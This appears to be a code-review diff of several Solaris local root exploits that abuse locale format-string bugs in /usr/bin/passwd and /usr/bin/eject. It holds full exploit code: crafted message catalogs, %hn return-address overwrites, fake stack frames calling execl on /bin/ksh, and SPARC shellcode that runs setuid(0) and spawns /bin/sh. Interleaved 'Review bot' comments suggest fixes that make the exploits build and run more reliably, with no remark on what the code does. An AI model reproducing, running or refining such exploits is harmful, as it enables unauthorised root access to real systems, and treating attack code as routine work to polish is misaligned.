for (i = 2; i < argc; i++) {
|
||||
if ( (sscanf(argv[i], \"--align=%d\", &align) ||
|
||||
sscanf(argv[i], \"--num=%d\", &num) ||
|
||||
sscanf(argv[i], \"--shellofs=%d\", &shellofs) ||
|
||||
sscanf(argv[i], \"--retlocofs=%d\", &retlocofs) ||
|
||||
sscanf(argv[i], \"--retloc=%x\", &retloc))== 0) {
|
||||
printf(\"Unrecognized option %s\\n\\n\", argv[i]);
|
||||
if ( (sscanf(argv[i], "--align=%d", &align) ||
|
||||
sscanf(argv[i], "--num=%d", &num) ||
|
||||
sscanf(argv[i], "--shellofs=%d", &shellofs) ||
|
||||
sscanf(argv[i], "--retlocofs=%d", &retlocofs) ||
|
||||
sscanf(argv[i], "--retloc=%x", &retloc))== 0) {
|
||||
printf("Unrecognized option %s\n\n", argv[i]);
|
||||
usage(argv[0]);
|
||||
}
|
||||
}
|
||||
|
@ -243,54 +243,54 @@ main(int argc, char **argv)
|
|||
|
||||
/* sh_add now points to the beginning of the shell buffer */
|
||||
|
||||
printf(\"Calculated shell buffer address: 0x%x\\n\", sh_addr);
|
||||
printf("Calculated shell buffer address: 0x%x\n", sh_addr);
|
||||
|
||||
if (shell == 1) {
|
||||
put_long(&shellbuf[align], sh_addr); /* put sh_addr on the stack */
|
||||
}
|
||||
|
||||
if ( ((sh_addr + align) & 0xfffffffc) != (sh_addr + align) ) {
|
||||
printf(\"Warning: sh_addr + align must be word aligned. Adjust shellofs and align as neccessary\\n\");
|
||||
printf("Warning: sh_addr + align must be word aligned. Adjust shellofs and align as neccessary\n");
|
||||
}
|
||||
|
||||
if (retloc == RETLOC) { /* if retloc was not specified on the command line, calculate it */
|
||||
retloc = sh_addr + align - num*4 + retlocofs;
|
||||
printf(\"Calculated retloc: 0x%x\\n\", retloc);
|
||||
printf("Calculated retloc: 0x%x\n", retloc);
|
||||
|
||||
put_long(&shellbuf[align+4], retloc);
|
||||
put_long(&shellbuf[align+12], retloc+2);
|
||||
}
|
||||
|
||||
jmp_addr = (sh_addr + align) + 64; /* Calculate the shell jump location */
|
||||
printf(\"Calculated shell code jump location: 0x%x\\n\\n\", jmp_addr);
|
||||
printf("Calculated shell code jump location: 0x%x\n\n", jmp_addr);
|
||||
|
||||
/* create the format string */
|
||||
|
||||
ptr = pattern;
|
||||
for (i = 0; i < num; i++) {
|
||||
memcpy(ptr, \"%.8x\", 4);
|
||||
memcpy(ptr, "%.8x", 4);
|
||||
ptr = ptr + 4;
|
||||
}
|
||||
|
||||
if (dump == 1) {
|
||||
*ptr = 0; /* null-terminate */
|
||||
printf(\"Stack dump mode, dumping %d words\\n\", num);
|
||||
printf("Stack dump mode, dumping %d words\n", num);
|
||||
}
|
||||
else if (shell == 1) {
|
||||
sprintf(ptr, \" Shell buffer: %%s\");
|
||||
sprintf(ptr, " Shell buffer: %%s");
|
||||
|
||||
printf(\"shellbuf (length = %d): %s\\n\\n\", strlen(shellbuf)+1, shellbuf);
|
||||
printf(\"Shell buffer dump mode, shell buffer address is 0x%x\\n\", sh_addr);
|
||||
printf("shellbuf (length = %d): %s\n\n", strlen(shellbuf)+1, shellbuf);
|
||||
printf("Shell buffer dump mode, shell buffer address is 0x%x\n", sh_addr);
|
||||
}
|
||||
else {
|
||||
reth = (jmp_addr >> 16) & 0xffff;
|
||||
retl = (jmp_addr >> 0) & 0xffff;
|
||||
|
||||
sprintf(ptr, \"%%%uc%%hn%%%uc%%hn\", (reth - num * 8), (retl - reth));
|
||||
printf(\"Exploit mode, jumping to 0x%x\\n\", jmp_addr);
|
||||
sprintf(ptr, "%%%uc%%hn%%%uc%%hn", (reth - num * 8), (retl - reth));
|
||||
printf("Exploit mode, jumping to 0x%x\n", jmp_addr);
|
||||
}
|
||||
|
||||
printf(\"num: %d\\t\\talign: %d\\tshellofs: %d\\tretlocofs: %d\\tretloc: 0x%x\\n\\n\",
|
||||
printf("num: %d\t\talign: %d\tshellofs: %d\tretlocofs: %d\tretloc: 0x%x\n\n",
|
||||
num, align, shellofs, retlocofs, retloc);
|
||||
|
||||
/* execute the vulnerable program using our custom environment */
|
||||
|
|
|
@ -23,11 +23,11 @@ It should be noted under Linux this problem must be exploited in conjunction wit
|
|||
* Tested in Solaris 2.6/7.0 (If it wont work, try adjust retloc offset. e.g.
|
||||
* ./ex -o -4 )
|
||||
*
|
||||
* $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e \'s/^.lib\\([_0-9a-zA-Z]*\\)\\.so.*/-l\\1/\'`
|
||||
* $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e 's/^.lib\([_0-9a-zA-Z]*\)\.so.*/-l\1/'`
|
||||
* usages: ./ex -h
|
||||
*
|
||||
* Thanks for Ivan Arce <iarce@core-sdi.com> who found this bug.
|
||||
* Thanks for horizon\'s great article about defeating noexec stack for Solaris.
|
||||
* Thanks for horizon's great article about defeating noexec stack for Solaris.
|
||||
*
|
||||
* THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN
|
||||
* ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR.
|
||||
|
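Review bot: the build line in the comment, `ldd /usr/bin/passwd|sed -e 's/^.lib\([_0-9a-zA-Z]*\)\.so.*/-l\1/'`, is now a working basic regular expression: `\(` and `\)` group the library name and `\1` reuses it as a `-l` flag; the doubled backslashes in the old line would have broken the sed expression when copied.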
@ -44,20 +44,20 @@ It should be noted under Linux this problem must be exploited in conjunction wit
|
|||
|
||||
#define BUFSIZE 2048 /* the size of format string buffer*/
|
||||
#define BUFF 128 /* the progname buffer size */
|
||||
#define SHELL \"/bin/ksh\" /* shell name */
|
||||
#define SHELL "/bin/ksh" /* shell name */
|
||||
#define DEFAULT_NUM 68 /* format strings number */
|
||||
#define DEFAULT_RETLOC 0xffbefb44 /* default retloc address */
|
||||
#define VULPROG \"/usr/bin/passwd\" /* vulnerable program name */
|
||||
#define VULPROG "/usr/bin/passwd" /* vulnerable program name */
|
||||
|
||||
void usages(char *progname)
|
||||
{
|
||||
|
||||
int i;
|
||||
printf(\"Usage: %s \\n\", progname);
|
||||
printf(\" [-h] Help menu\\n\");
|
||||
printf(\" [-n number] format string\'s number\\n\");
|
||||
printf(\" [-a align] retloc buffer alignment\\n\");
|
||||
printf(\" [-o offset] retloc offset\\n\\n\");
|
||||
printf("Usage: %s \n", progname);
|
||||
printf(" [-h] Help menu\n");
|
||||
printf(" [-n number] format string's number\n");
|
||||
printf(" [-a align] retloc buffer alignment\n");
|
||||
printf(" [-o offset] retloc offset\n\n");
|
||||
|
||||
}
|
||||
|
||||
|
@ -65,7 +65,7 @@ void usages(char *progname)
|
|||
long get_sp(void)
|
||||
|
||||
{
|
||||
__asm__(\"mov %sp,%i0\");
|
||||
__asm__("mov %sp,%i0");
|
||||
}
|
||||
|
||||
|
||||
|
@ -97,22 +97,22 @@ main( int argc, char **argv )
|
|||
|
||||
strncpy(progname, argv[0], BUFF-1);
|
||||
|
||||
while ((opt = getopt(argc, argv, \"n:a:o:h\")) != -1)
|
||||
while ((opt = getopt(argc, argv, "n:a:o:h")) != -1)
|
||||
switch((char)opt)
|
||||
{
|
||||
|
||||
case \'n\':
|
||||
case 'n':
|
||||
num = atoi(optarg);
|
||||
break;
|
||||
|
||||
case \'a\':
|
||||
case 'a':
|
||||
align = atoi(optarg);
|
||||
break;
|
||||
case \'o\':
|
||||
case 'o':
|
||||
offset = atoi(optarg);
|
||||
break;
|
||||
case \'?\':
|
||||
case \'h\':
|
||||
case '?':
|
||||
case 'h':
|
||||
default:
|
||||
usages(progname);
|
||||
exit(0);
|
||||
|
@ -125,8 +125,8 @@ main( int argc, char **argv )
|
|||
|
||||
/* Construct fake frame in environ */
|
||||
|
||||
env[0] = \"NLSPATH=:.\";
|
||||
env[1] = padding; /* padding so that fakeframe\'s address can be divided by 4 */
|
||||
env[0] = "NLSPATH=:.";
|
||||
env[1] = padding; /* padding so that fakeframe's address can be divided by 4 */
|
||||
/* sh_addr|sh_addr|0x00000000|fp2|fp2|fp2|fp2|fp2|0x00|/bin/ksh|0x00 */
|
||||
env[2]=(fakeframe); /* sh_addr|sh_addr|0x00 */
|
||||
env[3]=&(fakeframe[40]);/* |0x00 */
|
||||
|
@ -136,17 +136,17 @@ main( int argc, char **argv )
|
|||
env[7]=SHELL; /* shell strings */
|
||||
env[8]=NULL;
|
||||
|
||||
/* calculate the length of \"VULPROG\" + argv[1] */
|
||||
arg_len = strlen(VULPROG) + strlen(\"-z\") + 2;
|
||||
/* calculate the length of "VULPROG" + argv[1] */
|
||||
arg_len = strlen(VULPROG) + strlen("-z") + 2;
|
||||
|
||||
/* calculate the pad nummber .
|
||||
* We manage to let the length of padding + arg_len + \"NLSPATH=.\" can
|
||||
* We manage to let the length of padding + arg_len + "NLSPATH=." can
|
||||
* be divided by 4. So fakeframe address is aligned with 4, otherwise
|
||||
* the exploit won\'t work.
|
||||
* the exploit won't work.
|
||||
*/
|
||||
pad = 3 - (arg_len + strlen(env[0]) +1)%4;
|
||||
memset(padding, \'A\', pad);
|
||||
padding[pad] = \'\\0\';
|
||||
memset(padding, 'A', pad);
|
||||
padding[pad] = '\0';
|
||||
|
||||
/* get environ length */
|
||||
env_len = 0;
|
||||
|
@ -162,21 +162,21 @@ main( int argc, char **argv )
|
|||
* ^ ^
|
||||
* |__startaddr |__sp_addr
|
||||
*
|
||||
* \"sp_addr\" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6)
|
||||
* "sp_addr" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6)
|
||||
*
|
||||
* I find \"startaddr\" always can be divided by 4.
|
||||
* So we can adjust the padding\'s size to let the fakeframe address
|
||||
* I find "startaddr" always can be divided by 4.
|
||||
* So we can adjust the padding's size to let the fakeframe address
|
||||
* can be aligned with 4.
|
||||
*
|
||||
* len = length of \"argv\" + \"env\" + \"platform\" + \"program name\"
|
||||
* len = length of "argv" + "env" + "platform" + "program name"
|
||||
* if (len%4)!=0, sp_addr - startaddr = (len/4)*4 + 4
|
||||
* if (len%4)==0, sp_addr - startaddr = len
|
||||
* So we can get every entry\'s address precisely based on startaddr or sp_addr.
|
||||
* Now we won\'t be bored with guessing the alignment and offset.:)
|
||||
* So we can get every entry's address precisely based on startaddr or sp_addr.
|
||||
* Now we won't be bored with guessing the alignment and offset.:)
|
||||
*/
|
||||
len = arg_len + env_len + strlen(plat) + 1
|
||||
+ strlen(VULPROG) + 1;
|
||||
printf(\"len = %#x\\n\", len);
|
||||
printf("len = %#x\n", len);
|
||||
|
||||
/* get stack bottom address */
|
||||
|
||||
|
@ -189,7 +189,7 @@ main( int argc, char **argv )
|
|||
sh_addr = sp_addr - (4 - len%4) /* the trailing zero number */
|
||||
- strlen(VULPROG) - strlen(plat) - strlen(SHELL) - 3 ;
|
||||
|
||||
printf(\"SHELL address = %#x\\n\", sh_addr);
|
||||
printf("SHELL address = %#x\n", sh_addr);
|
||||
|
||||
/* get our fake frame address */
|
||||
fp_addr = sh_addr - 8*8 - 1;
|
||||
|
@ -197,27 +197,27 @@ main( int argc, char **argv )
|
|||
/* get execl() address */
|
||||
if (!(handle=dlopen(NULL,RTLD_LAZY)))
|
||||
{
|
||||
fprintf(stderr,\"Can\'t dlopen myself.\\n\");
|
||||
fprintf(stderr,"Can't dlopen myself.\n");
|
||||
exit(1);
|
||||
}
|
||||
if ((execl_addr=(long)dlsym(handle,\"execl\"))==NULL)
|
||||
if ((execl_addr=(long)dlsym(handle,"execl"))==NULL)
|
||||
{
|
||||
fprintf(stderr,\"Can\'t find execl().\\n\");
|
||||
fprintf(stderr,"Can't find execl().\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
/* dec 4 to skip the \'save\' instructure */
|
||||
/* dec 4 to skip the 'save' instructure */
|
||||
execl_addr -= 4;
|
||||
|
||||
/* check if the exec addr includes zero */
|
||||
if (!(execl_addr & 0xff) || !(execl_addr * 0xff00) ||
|
||||
!(execl_addr & 0xff0000) || !(execl_addr & 0xff000000))
|
||||
{
|
||||
fprintf(stderr,\"the address of execl() contains a \'0\'. sorry.\\n\");
|
||||
fprintf(stderr,"the address of execl() contains a '0'. sorry.\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf(\"Using execl() address : %#x\\n\",execl_addr);
|
||||
printf("Using execl() address : %#x\n",execl_addr);
|
||||
|
||||
/* now we set up our fake stack frame */
|
||||
|
||||
|
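Review bot: `!(execl_addr * 0xff00)` in the zero-byte check uses multiplication where the neighbouring terms use `&`; as written that term is only true when `execl_addr` is itself 0, so a zero in the second byte is never detected. It sits in unchanged context, not in this commit's change, but `!(execl_addr & 0xff00)` is the consistent form. The restored `fprintf(stderr,"Can't dlopen myself.\n");` and `dlsym(handle,"execl")` lines are correct; comparing the `long` cast of `dlsym`'s result to `NULL` mixes integer and pointer types and would be cleaner as `== 0`.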
@ -239,15 +239,15 @@ main( int argc, char **argv )
|
|||
*addrptr++=fp1_addr;
|
||||
*addrptr++=fp1_addr;
|
||||
*addrptr++=fp1_addr; /* we need this address to work */
|
||||
*addrptr++=fp1_addr; /* cause we don\'t need exec another func,so put garbage here */
|
||||
*addrptr++=fp1_addr; /* cause we don't need exec another func,so put garbage here */
|
||||
|
||||
*addrptr++=0x0;
|
||||
/* get correct retloc in solaris 2.6(0xefffxxxx) and solaris 7/8 (0xffbexxxx) */
|
||||
retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff);
|
||||
|
||||
printf(\"Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\\n\", retloc, fp_addr, align );
|
||||
printf("Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\n", retloc, fp_addr, align );
|
||||
|
||||
/* Let\'s make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/
|
||||
/* Let's make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/
|
||||
|
||||
addrptr = (long *)retlocbuf;
|
||||
for( i = 0 ; i < 8 ; i ++ )
|
||||
|
@ -258,19 +258,19 @@ main( int argc, char **argv )
*(addrptr + 7) = retloc + 2;

if((pattern = (char *)malloc(BUFSIZE)) == NULL) {
printf(\"Can\'t get enough memory!\\n\");
printf("Can't get enough memory!\n");
exit(-1);
}

/* Let\'s make formats string buffer:
/* Let's make formats string buffer:
* |A..AAAAAAAAAAAA|%.8x....|%(fp1)c%hn%(fp2)%hn%(execl1)c%hn%(execl2)%hn|
*/
ptr = pattern;
memset(ptr, \'A\', 32);
memset(ptr, 'A', 32);
ptr += 32;

for(i = 0 ; i < num ; i++ ){
memcpy(ptr, \"%.8x\", 4);
memcpy(ptr, "%.8x", 4);
ptr += 4;
}

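
Review bot: the `for` loop writes `32 + 4*num` bytes into the `BUFSIZE` (2048) allocation with no bound on `num`, which comes straight from the command line; check `num` against what fits in `BUFSIZE` (minus the 32-byte prefix and the trailing `sprintf` output) before the loop, or use `snprintf`-style accounting, so an oversized argument fails cleanly instead of overrunning `pattern`.
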
@ -281,30 +281,30 @@ main( int argc, char **argv )


/* Big endian arch */
sprintf(ptr, \"%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn\",
sprintf(ptr, "%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn",
(reth - num*8 -4*8 + align ), (0x10000 + retl - reth),
(0x20000 + reth1 - retl), (0x30000 + retl1 - reth1));

if( !(fp = fopen(\"messages.po\", \"w+\")))
if( !(fp = fopen("messages.po", "w+")))
{
perror(\"fopen\");
perror("fopen");
exit(1);
}
fprintf(fp,\"domain \\\"messages\\\"\\n\");
fprintf(fp,\"msgid \\\"%%s: illegal option -- %%c\\\\n\\\"\\n\");
fprintf(fp,\"msgstr \\\"%s\\\\n\\\"\", pattern + align);
fprintf(fp,"domain \"messages\"\n");
fprintf(fp,"msgid \"%%s: illegal option -- %%c\\n\"\n");
fprintf(fp,"msgstr \"%s\\n\"", pattern + align);
fclose(fp);
system(\"/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po\");
system("/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po");

/* thanks for z33d\'s idea.
/* thanks for z33d's idea.
* It seems we have to do like this in Solaris 8.
*/
i=open(\"./SUNW_OST_OSLIB\",O_RDWR);
i=open("./SUNW_OST_OSLIB",O_RDWR);
/* locate the start position of formats strings in binary file*/
lseek(i, 62, SEEK_SET);
/* replace the start bytes with our retlocbuf */
write(i, retlocbuf + align, 32 - align);
close(i);

execle(VULPROG, VULPROG, \"-z\", NULL, env);
execle(VULPROG, VULPROG, "-z", NULL, env);
} /* end of main */
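
Review bot: the `open`/`lseek`/`write` sequence on `./SUNW_OST_OSLIB` never checks a return value, and neither does the `system("/usr/bin/msgfmt ...")` call before it; if `msgfmt` is missing or `open` returns -1, the program silently continues to `execle`. Report failures the same way the `fopen` branch does (`perror` and `exit`).
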
@ -19,7 +19,7 @@ It should be noted under Linux this problem must be exploited in conjunction wit
*/


/* \"eject\" exploit for locale subsystem format strings bug In Solaris
/* "eject" exploit for locale subsystem format strings bug In Solaris
* Tested in Solaris 2.6/7.0
* Script kiddies: you should modify this code
* slightly by yourself. :)
@ -37,30 +37,30 @@ It should be noted under Linux this problem must be exploited in conjunction wit

#define RETLOC 0xffbefa2c /* default retloc */
#define NUM 95 /* maybe should adjust this number */
#define ALIGN 0 /* If don\'t work ,try adjust align to 0,1,2,3 */
#define ALIGN 0 /* If don't work ,try adjust align to 0,1,2,3 */

#define BUFSIZE 2048 /* the size of format string buffer*/
#define EGGSIZE 1024 /* the egg buffer size */
#define NOP 0xfa1d4015 /* \"xor %l5, %l5, %l5\" */
#define NOP 0xfa1d4015 /* "xor %l5, %l5, %l5" */
#define ALIGN1 2

#define VULPROG \"/usr/bin/eject\"
#define VULPROG "/usr/bin/eject"

char shellcode[] = /* from scz\'s funny shellcode for SPARC */
\"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\" /* setuid(0) */
\"\\xaa\\x1d\\x40\\x15\\x90\\x05\\x60\\x01\\x92\\x10\\x20\\x09\" /* dup2(1,2) */
\"\\x94\\x05\\x60\\x02\\x82\\x10\\x20\\x3e\\x91\\xd0\\x20\\x08\"
\"\\x20\\x80\\x49\\x73\\x20\\x80\\x62\\x61\\x20\\x80\\x73\\x65\\x20\\x80\\x3a\\x29\"
\"\\x7f\\xff\\xff\\xff\\x94\\x1a\\x80\\x0a\\x90\\x03\\xe0\\x34\\x92\\x0b\\x80\\x0e\"
\"\\x9c\\x03\\xa0\\x08\\xd0\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc\\xc0\\x2a\\x20\\x07\"
\"\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\\x90\\x1b\\xc0\\x0f\\x82\\x10\\x20\\x01\"
\"\\x91\\xd0\\x20\\x08\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\";
char shellcode[] = /* from scz's funny shellcode for SPARC */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* setuid(0) */
"\xaa\x1d\x40\x15\x90\x05\x60\x01\x92\x10\x20\x09" /* dup2(1,2) */
"\x94\x05\x60\x02\x82\x10\x20\x3e\x91\xd0\x20\x08"
"\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29"
"\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e"
"\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";

/* get current stack point address to guess Return address */
long get_sp(void)

{
__asm__(\"mov %sp,%i0\");
__asm__("mov %sp,%i0");
}


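
Review bot: `get_sp` has no `return` statement and relies on the inline `mov %sp,%i0` landing in the SPARC return register when the function's `restore` runs, which is compiler- and optimisation-level dependent and is undefined behaviour for a non-void function in C; write the value to a local through an `asm` output operand and return it explicitly.
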
@ -76,14 +76,14 @@ main( int argc, char **argv )
long reth, retl;
FILE *fp;

if( argc > 1 ) sscanf(argv[1],\"%x\",&retloc);
if( argc > 1 ) sscanf(argv[1],"%x",&retloc);
if( argc > 2 ) align = atoi(argv[2]);
if( argc > 3 ) num = atoi(argv[3]);


addrptr = (long *) retlocbuf;
retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff);
/* Let\'s make reloc buffer */
/* Let's make reloc buffer */

for( i = 0 ; i < 2 ; i ++ ){
*addrptr++ = 0x41414141;
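
Review bot: `sscanf(argv[1],"%x",&retloc)` stores an `unsigned int` through a pointer to `long`; use `%lx` (and check that `sscanf` returned 1). The `atoi` results for `align` and `num` are also taken unvalidated; `num` later sizes a loop that writes into a fixed `BUFSIZE` buffer.
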
@ -94,7 +94,7 @@ main( int argc, char **argv )

/* construct shellcode buffer */

memset(eggbuf,\'A\',EGGSIZE); /* fill the eggbuf with garbage */
memset(eggbuf,'A',EGGSIZE); /* fill the eggbuf with garbage */
for (i = align; i < EGGSIZE; i+=4) /* fill with NOP */
{
eggbuf[i+3]=NOP & 0xff;
@ -106,8 +106,8 @@ main( int argc, char **argv )
If not, exploit will fail. Anyway, our shellcode is. ;-)
*/
memcpy(eggbuf + EGGSIZE - strlen(shellcode) - 4 + align, shellcode, strlen(shellcode));
//memcpy(eggbuf,\"EGG=\",4);/* Now : EGG=NOP...NOPSHELLCODE */
env[0] = \"NLSPATH=:.\";
//memcpy(eggbuf,"EGG=",4);/* Now : EGG=NOP...NOPSHELLCODE */
env[0] = "NLSPATH=:.";
env[1] = eggbuf; /* put eggbuf in env */
env[2] = NULL; /* end of env */

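
Review bot: the commented-out `memcpy(eggbuf,"EGG=",4)` still carries the trailing comment `Now : EGG=NOP...NOPSHELLCODE`, but since the call is dead code `env[1]` is the bare buffer with no `EGG=` prefix; either delete the dead line or reword the comment so it describes the layout that is actually built.
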
@ -117,43 +117,43 @@ main( int argc, char **argv )
/* get stack bottom address */
sp_addr = (get_sp() | 0xffff) & 0xfffffffc;
/* get shellcode address . many thanks to Olaf Kirch. :)
* the trailing \'8\' make sure our sh_addr into \"NOP\"s area.
* the trailing '8' make sure our sh_addr into "NOP"s area.
*/
sh_addr = sp_addr - strlen(VULPROG) - strlen(plat) - strlen(eggbuf) - 3 + 8 ;

printf(\"Usages: %s <retloc> <align> <num> <bufsize> \\n\\n\", argv[0] );
printf(\"Using RETloc address = 0x%x, RET address = 0x%x ,Align= %d\\n\", retloc, sh_addr, align );
printf("Usages: %s <retloc> <align> <num> <bufsize> \n\n", argv[0] );
printf("Using RETloc address = 0x%x, RET address = 0x%x ,Align= %d\n", retloc, sh_addr, align );

if((pattern = (char *)malloc(BUFSIZE)) == NULL) {
printf(\"Can\'t get enough memory!\\n\");
printf("Can't get enough memory!\n");
exit(-1);
}

ptr = pattern;
for(i = 0 ; i < num ; i++ ){
memcpy(ptr, \"%.8x\", 4);
memcpy(ptr, "%.8x", 4);
ptr += 4;
}

reth = (sh_addr >> 16) & 0xffff ;
retl = (sh_addr >> 0) & 0xffff ;
sprintf(ptr, \"%%%uc%%hn%%%uc%%hn\",(reth - num*8),
sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(reth - num*8),
(0x10000 + retl - reth));

printf(\"%s\",pattern);
printf("%s",pattern);

if( !(fp = fopen(\"messages.po\", \"w+\")))
if( !(fp = fopen("messages.po", "w+")))
{
perror(\"fopen\");
perror("fopen");
exit(1);
}
fprintf(fp,\"domain \\\"messages\\\"\\n\");
fprintf(fp,\"msgid \\\"usage: %%s [-fndq] [name | nickname]\\\\n\\\"\\n\");
fprintf(fp,\"msgstr \\\"%s\\\\n\\\"\", pattern);
fprintf(fp,"domain \"messages\"\n");
fprintf(fp,"msgid \"usage: %%s [-fndq] [name | nickname]\\n\"\n");
fprintf(fp,"msgstr \"%s\\n\"", pattern);
fclose(fp);
system(\"/usr/bin/msgfmt messages.po\");
system(\"cp messages.mo SUNW_OST_OSCMD\");
system(\"cp messages.mo SUNW_OST_OSLIB\");
system("/usr/bin/msgfmt messages.po");
system("cp messages.mo SUNW_OST_OSCMD");
system("cp messages.mo SUNW_OST_OSLIB");

execle(VULPROG,VULPROG,\"-x\",retlocbuf + align1, NULL, env);
execle(VULPROG,VULPROG,"-x",retlocbuf + align1, NULL, env);
} /* end of main */
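
Review bot: the usage string on the changed `printf` line advertises a `<bufsize>` argument, but the argument parsing earlier in this file stops at `argv[3]` (`num`), so the fourth argument is never read; drop it from the usage text or implement it. The bare `printf("%s",pattern)` is debugging output that dumps the whole format string unconditionally, and the three `system()` calls are again unchecked.
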
@ -3,11 +3,11 @@
* Tested in Solaris 2.6/7.0 (If it wont work, try adjust retloc offset. e.g.
* ./ex -o -4 )
*
* $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e \'s/^.lib\\([_0-9a-zA-Z]*\\)\\.so.*/-l\\1/\'`
* $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e 's/^.lib\([_0-9a-zA-Z]*\)\.so.*/-l\1/'`
* usages: ./ex -h
*
* Thanks for Ivan Arce <iarce@core-sdi.com> who found this bug.
* Thanks for horizon\'s great article about defeating noexec stack for Solaris.
* Thanks for horizon's great article about defeating noexec stack for Solaris.
*
* THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN
* ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR.
@ -24,26 +24,26 @@

#define BUFSIZE 2048 /* the size of format string buffer */
#define BUFF 128 /* the progname buffer size */
#define SHELL \"/bin/ksh\" /* shell name */
#define SHELL "/bin/ksh" /* shell name */
#define DEFAULT_NUM 68 /* format strings number */
#define DEFAULT_RETLOC 0xffbefb44 /* default retloc address */
#define VULPROG \"/usr/bin/passwd\" /* vulnerable program name */
#define VULPROG "/usr/bin/passwd" /* vulnerable program name */

void usages(char *progname)
{
int i;
printf(\"Usage: %s \\n\", progname);
printf(\" [-h] Help menu\\n\");
printf(\" [-n number] format string\'s number\\n\");
printf(\" [-a align] retloc buffer alignment\\n\");
printf(\" [-o offset] retloc offset\\n\\n\");
printf("Usage: %s \n", progname);
printf(" [-h] Help menu\n");
printf(" [-n number] format string's number\n");
printf(" [-a align] retloc buffer alignment\n");
printf(" [-o offset] retloc offset\n\n");

}

/* get current stack point address to guess Return address */
long get_sp(void)
{
__asm__(\"mov %sp,%i0\");
__asm__("mov %sp,%i0");
}

main( int argc, char **argv )
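
Review bot: `int i` in `usages` is unused, and `main( int argc, char **argv )` has no return type (implicit `int`, rejected by C99 and later compilers); declare it `int main(...)`. `get_sp` has the same missing-`return` issue as the other copy of this helper: the `mov %sp,%i0` trick only works if the compiler leaves `%i0` untouched before `ret`/`restore`.
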
@ -70,22 +70,22 @@ main( int argc, char **argv )
char progname[BUFF];
strncpy(progname, argv[0], BUFF-1);

while ((opt = getopt(argc, argv, \"n:a:o:h\")) != -1)
while ((opt = getopt(argc, argv, "n:a:o:h")) != -1)
switch((char)opt)
{

case \'n\':
case 'n':
num = atoi(optarg);
break;

case \'a\':
case 'a':
align = atoi(optarg);
break;
case \'o\':
case 'o':
offset = atoi(optarg);
break;
case \'?\':
case \'h\':
case '?':
case 'h':
default:
usages(progname);
exit(0);
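
Review bot: `strncpy(progname, argv[0], BUFF-1)` does not NUL-terminate `progname` when `argv[0]` is `BUFF-1` characters or longer, and nothing else terminates it before `usages(progname)` prints it with `%s`; add `progname[BUFF-1] = '\0'` after the copy. The `(char)opt` cast in the `switch` is unnecessary since the `case` labels are already `int` constants.
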
@ -98,8 +98,8 @@ main( int argc, char **argv )

/* Construct fake frame in environ */

env[0] = \"NLSPATH=:.\";
env[1] = padding; /* padding so that fakeframe\'s address can be divided by 4 */
env[0] = "NLSPATH=:.";
env[1] = padding; /* padding so that fakeframe's address can be divided by 4 */
/* sh_addr|sh_addr|0x00000000|fp2|fp2|fp2|fp2|fp2|0x00|/bin/ksh|0x00 */
env[2]=(fakeframe); /* sh_addr|sh_addr|0x00 */
env[3]=&(fakeframe[40]);/* |0x00 */
@ -109,17 +109,17 @@ main( int argc, char **argv )
env[7]=SHELL; /* shell strings */
env[8]=NULL;

/* calculate the length of \"VULPROG\" + argv[1] */
arg_len = strlen(VULPROG) + strlen(\"-z\") + 2;
/* calculate the length of "VULPROG" + argv[1] */
arg_len = strlen(VULPROG) + strlen("-z") + 2;

/* calculate the pad nummber .
* We manage to let the length of padding + arg_len + \"NLSPATH=.\" can
* We manage to let the length of padding + arg_len + "NLSPATH=." can
* be divided by 4. So fakeframe address is aligned with 4, otherwise
* the exploit won\'t work.
* the exploit won't work.
*/
pad = 3 - (arg_len + strlen(env[0]) +1)%4;
memset(padding, \'A\', pad);
padding[pad] = \'\\0\';
memset(padding, 'A', pad);
padding[pad] = '\0';

/* get environ length */
env_len = 0;
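
Review bot: the comment block says the padding accounts for `"NLSPATH=."`, but `env[0]` is set to `"NLSPATH=:."` in the preceding hunk; the arithmetic is right because it uses `strlen(env[0])`, so only the comment needs to match ("nummber" is also a typo). Since `pad` is derived from string lengths, a bounds check against the declared size of `padding` would make the `memset`/`padding[pad]` writes self-evidently safe.
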
@ -134,21 +134,21 @@ main( int argc, char **argv )
* ^ ^
* |__startaddr |__sp_addr
*
* \"sp_addr\" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6)
* "sp_addr" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6)
*
* I find \"startaddr\" always can be divided by 4.
